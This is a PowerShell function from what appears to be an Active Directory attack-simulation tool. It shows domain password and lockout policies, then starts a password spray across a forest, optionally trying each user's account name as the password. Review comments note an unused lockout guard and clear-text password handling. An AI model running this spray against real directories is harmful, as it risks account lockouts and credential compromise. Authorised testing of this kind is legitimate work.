Private/New-UserManipulation.ps1
|
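function New-UserManipulation {
    <#
    .SYNOPSIS
        Drives the "User Manipulation" step: prints the password policy of every
        domain in the forest, lets the operator confirm the password and the
        samAccountName option, then calls Start-PasswordSprayAttack for the
        chosen scope.

    .DESCRIPTION
        Takes no parameters. $UnAttended is not defined in this function and is
        resolved from an enclosing scope; when it is set, both prompts are
        skipped and the samAccountName option defaults to enabled.

        Reads  : $Script:DateFormatLog, $Script:FGCHighLight, $Script:Yes,
                 $Script:No, $Script:Phase04
        Writes : $Script:DoaminTypes (spelling kept as-is; other files may read
                 the variable under this name)

        The function returns early, without calling Start-PasswordSprayAttack,
        when Set-AttackScope returns "SKIP" or the operator picks Cancel.

    .OUTPUTS
        The Format-Table objects of the policy summary are written to the
        pipeline; nothing else is returned.

    .NOTES
        The start/end log markers are paired through try/finally, so the early
        returns and terminating errors also write the run time and the
        "End Function" line.
    #>
    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)

    try {
        #################### main code | out-host #####################
        $Forest = Get-ADForest
        $Script:DoaminTypes = Get-DomainType

        $AllDomainsDetails = $Forest.Domains | ForEach-Object { Get-DomainPWDetails -DomainName $_ }

        Write-Host "`nCurrent Domain Settings:" -ForegroundColor $Script:FGCHighLight
        $SummaryColumns = @(
            @{N = 'Domain'; E = { $_.NetBIOSName } },
            @{N = 'DomainType'; E = { $_.DomainType } },
            @{N = 'Enabled Users'; E = { $_.EnabledUser } },
            @{N = 'Min. Pw Length'; E = { $_.MinPasswordLength } },
            @{N = 'Complexity'; E = { $_.ComplexityEnabled } },
            @{N = 'Lockout Threshold'; E = { $_.LockoutThreshold } },
            @{N = 'Lockout Duration'; E = { $_.LockoutDuration } },
            @{N = 'LockWin'; E = { $_.LockoutObservationWindow } },
            @{N = 'RevEnc'; E = { $_.ReversibleEncryptionEnabled } },
            @{N = 'FQDN'; E = { $_.DomainFQDN } }
        )
        $AllDomainsDetails | Select-Object -Property $SummaryColumns | Format-Table -AutoSize

        # Lowest non-zero lockout threshold across all domains of the forest.
        # NOTE(review): nothing below reads $NoLT. The samAccountName option makes
        # two logon attempts per account (see the prompt help text), so a run can
        # lock out accounts in a domain whose threshold is that low. Presumably
        # this value was meant to gate or warn on that; confirm and wire it up.
        [int] $NoLT = ($AllDomainsDetails |
                Where-Object { $null -ne $_.LockoutThreshold -and $_.LockoutThreshold -gt 0 } |
                Measure-Object -Property LockoutThreshold -Minimum).Minimum

        $DomainSearchBase = Set-AttackScope -Action "User Manipulation"
        If ($DomainSearchBase -eq "SKIP") {
            return
        }

        $NewRandomPW = Get-RandomPassword

        If (-not $UnAttended) {
            # NOTE(review): the password is shown in clear text in the prompt and
            # its help text, typed via Read-Host without -AsSecureString, and
            # persisted through Set-KeyValue under "LastPW". Where that store lives
            # is not visible here; confirm it is access-restricted and that
            # console transcripts/logs do not capture these lines.
            $title = "Confirm or change the random password"
            $message = "The current password is: $NewRandomPW"
            $Options = @(
                [pscustomobject] @{
                    Label = "&Keep"
                    Help  = "Keep the random password '$NewRandomPW' regarding the password reset."
                    Value = $Script:Yes
                },
                [pscustomobject] @{
                    Label = "&Change"
                    Help  = "Enter a different password regarding the password reset."
                    Value = "Change"
                }
            )
            $prompt = Show-DecisionPrompt -Message $message -Options $Options -Default 0 -Title $title

            if ($prompt -ne $Script:Yes) {
                # Re-prompt until the operator enters something other than whitespace.
                do {
                    $NewRandomPW = Read-Host "`n Enter new password"
                    if ([string]::IsNullOrWhiteSpace($NewRandomPW)) {
                        Invoke-Output -Type Warning -Message "Please enter at least one character!"
                    }
                } while ([string]::IsNullOrWhiteSpace($NewRandomPW))
                Set-KeyValue -key "LastPW" -NewValue $NewRandomPW
            }
        }

        If (-not $UnAttended) {
            $title = "Attack Phase - $($Script:Phase04.toupper()) - starts now ..."
            $message = "Also test each user's samAccountName as a potential password?"
            $Options = @(
                [pscustomobject] @{
                    Label = "&Yes"
                    Help  = "Two password attempts will be performed per user:`n 1. The configured password`n 2. The user's samAccountName"
                    Value = $Script:Yes
                },
                [pscustomobject] @{
                    Label = "&No"
                    Help  = "Only the configured password will be tested."
                    Value = $Script:No
                },
                [pscustomobject] @{
                    Label = "&Cancel"
                    Help  = "Cancel whole password spray."
                    Value = "Skip"
                }
            )
            $decision = Show-DecisionPrompt -Message $message -Options $Options -Default 0 -Title $title
        }
        else {
            # Unattended runs get no prompt and take the two-attempt variant.
            $decision = $Script:Yes
        }

        If ($decision -eq $Script:Yes) {
            $IncludeSamAccountNameAsPassword = $true
        }
        elseif ($decision -eq $Script:No) {
            $IncludeSamAccountNameAsPassword = $false
        }
        else {
            # Any other value (the Cancel option returns "Skip") aborts the step.
            Invoke-Output -Type Success -Message "Password Spray cancelled by user."
            return
        }

        If ($DomainSearchBase -eq "All Domains in Forest") {
            # Reuse the forest object fetched above instead of querying AD again.
            foreach ($domain in $Forest.Domains) {
                $DomainSearchBase = (Get-ADDomain -Server $domain).DistinguishedName
                $runtime = Measure-Command {
                    Start-PasswordSprayAttack -SearchBase $DomainSearchBase -Password $NewRandomPW -Server $domain -IncludeSamAccountNameAsPassword:$IncludeSamAccountNameAsPassword
                }
                Write-Log -Message "Finished in $($runtime.TotalSeconds) seconds."
            }
        }
        else {
            $server = Get-BestDomainController -domain $DomainSearchBase
            $runtime = Measure-Command {
                Start-PasswordSprayAttack -SearchBase $DomainSearchBase -Password $NewRandomPW -Server $server -IncludeSamAccountNameAsPassword:$IncludeSamAccountNameAsPassword
            }
            Write-Log -Message "Finished in $($runtime.TotalSeconds) seconds."
        }
        ######################## main code ############################
    }
    finally {
        # Runs on normal completion, on both early returns and on errors, so
        # every "Start Function" marker in the log has a matching end marker.
        $runtime = Get-RunTime -StartRunTime $StartRunTime
        Write-Log -Message " Run Time: $runtime [h] ###"
        Write-Log -Message "### End Function $CurrentFunction ###"
    }
}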